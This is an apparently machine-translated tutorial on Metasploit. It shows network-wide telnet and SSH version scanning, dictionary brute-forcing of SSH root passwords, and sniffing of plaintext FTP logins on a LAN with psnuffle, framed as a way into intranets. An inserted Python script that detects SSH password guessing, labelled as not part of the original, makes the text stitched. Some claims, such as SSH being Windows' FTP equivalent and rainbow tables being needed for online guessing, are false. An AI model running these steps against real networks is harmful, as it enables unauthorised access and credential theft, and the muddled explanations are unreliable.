Learning Metasploit: scanning three common services and guessing passwords

2025-01-16 Update From: SLTechnology News&Howtos shulou


Shulou(Shulou.com)06/01 Report--

Sometimes we use Nmap to find the open ports and services on a server, but we are not professional hackers, and often all we can break is FTP, file sharing and telnet. These are low-end targets, but if you are already inside a local area network, the three services above are bound to exist.

Use telnet to scan

> search telnet_version    looks up the telnet scan module

> use auxiliary/scanner/telnet/telnet_version    uses this module

> set RHOSTS 192.168.1.0/24    scans the entire network segment

> set THREADS 100    sets the number of threads; you can choose this value yourself

> run

Use ssh to scan

> search ssh_version    looks up the ssh scan module

> use auxiliary/scanner/ssh/ssh_version    the path may be different in your version

> set RHOSTS 192.168.1.0/24    scans the entire network segment

> set THREADS 100    sets the number of threads; you can choose this value yourself

> run

Scanning other services works in more or less the same way. If you want to scan a different service, you can first run

> search name_version

to find out which services are supported. Of course, this is a process of accumulation; other commonly scanned services include Oracle, MSSQL, MySQL and so on. Most of the time we are working blind, and Nmap is enough to solve the problem. More often, we use this tool to prepare for later guessing and monitoring. Here are some guessing methods.

Guessing of SSH Service password

An SSH server is the equivalent of FTP under Windows. I don't think most administrators will configure passwords, because SSH can be encrypted and verified through public key pairs, which are difficult to guess. Of course, some administrators may still set account passwords, so we can use the following commands to guess them. You also need a big enough rainbow table.

> search ssh    if you are proficient, you can type the path directly. Anyway, I can't remember it, and there are so many modules that it is difficult to master all of them in a short time.

> use auxiliary/scanner/ssh/ssh_login    selects the ssh password guessing module

> set RHOSTS 192.168.1.105    sets the target host

> set USERNAME root    sets the user name to root

> set PASS_FILE /root/password.txt    this is a dictionary I made myself. There are many tools; whether the result is good or bad depends on the dictionary.

> set THREADS 50    sets the number of threads. If this is set too high, the service may crash or refuse connections; if it is set too low, the guessing will be slow.

> run

Because I don't joke about my career, I've only tested it in my own environment, so it is not easy for me to judge the effect.
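How the ssh_login run above looks from the defender's side, as an added example that is not part of the original article: the script flags any source address that produces many failed SSH password logins within a short window. The log lines are constructed samples in OpenSSH's syslog format, and the function name, threshold and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in OpenSSH sshd syslog format (not taken from the article).
SAMPLE_LOG = """\
Jan 16 10:00:01 host sshd[2101]: Failed password for root from 192.168.1.50 port 40112 ssh2
Jan 16 10:00:01 host sshd[2102]: Failed password for root from 192.168.1.50 port 40114 ssh2
Jan 16 10:00:02 host sshd[2103]: Failed password for root from 192.168.1.50 port 40116 ssh2
Jan 16 10:00:02 host sshd[2104]: Failed password for root from 192.168.1.50 port 40118 ssh2
Jan 16 10:00:03 host sshd[2105]: Failed password for root from 192.168.1.50 port 40120 ssh2
Jan 16 10:00:03 host sshd[2106]: Failed password for root from 192.168.1.50 port 40122 ssh2
Jan 16 10:02:10 host sshd[2110]: Accepted publickey for admin from 192.168.1.20 port 51514 ssh2
Jan 16 10:05:00 host sshd[2120]: Failed password for invalid user test from 192.168.1.77 port 33000 ssh2
Jan 16 10:09:00 host sshd[2121]: Failed password for alice from 192.168.1.77 port 33002 ssh2
"""

FAILED = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+"
)

def detect_guessing(log_text, threshold=5, window=timedelta(seconds=60), year=2025):
    """Return {source_ip: sorted usernames tried} for every source that reaches
    `threshold` failed password logins inside a sliding `window`."""
    recent = defaultdict(deque)   # source -> timestamps of failures still in the window
    users = defaultdict(set)      # source -> account names it has tried
    flagged = {}
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if not m:
            continue              # accepted logins and unrelated lines are ignored
        # syslog timestamps carry no year, so one is supplied (assumption)
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        user, src = m.group(2), m.group(3)
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:  # drop failures that fell out of the window
            q.popleft()
        users[src].add(user)
        if len(q) >= threshold:
            flagged[src] = sorted(users[src])
    return flagged

if __name__ == "__main__":
    print(detect_guessing(SAMPLE_LOG))
```

The two failures from 192.168.1.77 are four minutes apart, so they never share a window and that host is not flagged, which is why slow guessing needs a longer window or a per-day count.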

FTP sniffer tool psnuffle

This tool sniffs FTP, which is transmitted in plaintext, so what you see is what you get. It is very useful for cracking an intranet, especially on Windows systems: if the FTP service is the one built with IIS, then the account you sniff must have user permission on the system, and you can imagine the rest. If the service is run by separate FTP software, then in my personal opinion the account is of little use even if you get it, unless you can get write permission, in which case you can upload a shell. All right, without further discussion, let's take a look at how to use psnuffle, a tool with a tongue-twisting name:

> use auxiliary/sniffer/psnuffle

> run

Of course, if you know the port you can also add some restrictions with the set command. This sniffing may need to stay open for a few hours, because no one knows when someone will log in to FTP. Sometimes when I am in the local area network I would rather do DNS spoofing; I feel that it is simpler and more brutal. Of course, it may be caught directly by the firewall, hehe.
